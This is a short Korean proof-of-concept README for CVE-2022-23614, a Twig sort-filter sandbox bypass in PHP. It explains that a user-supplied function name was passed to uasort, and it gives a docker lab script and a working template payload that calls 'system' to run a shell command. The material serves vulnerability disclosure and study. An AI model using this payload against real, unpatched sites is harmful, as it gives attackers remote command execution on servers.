
CVE-2022-23614에 대한 개념 증명 익스플로잇으로, PHP 애플리케이션에서 Twig의 sort 필터 샌드박스 우회를 통한 임의 코드 실행을 시연합니다.
CVE-2022-23614, GHSA-5mv2-rx3q-4w2v에 대한 PoC (Twig sort 필터 코드 실행/샌드박스 우회)
이 커밋에서 볼 수 있듯이 - https://github.com/twigphp/Twig/commit/.., Twig는 사용자가 제공한 함수 이름을 uasort의 콜백 매개변수로 전달하고 있었으며(여기), 이로 인해 임의 코드 실행이 발생했습니다.
취약한 Twig 버전으로 docker 컨테이너를 빌드하고 실행하려면
$ ./build-docker.sh
localhost:1337에서 웹페이지를 열고 다음 페이로드를 렌더링해 보세요.
{{ ['id','']|sort('system') }}
PoC

결과
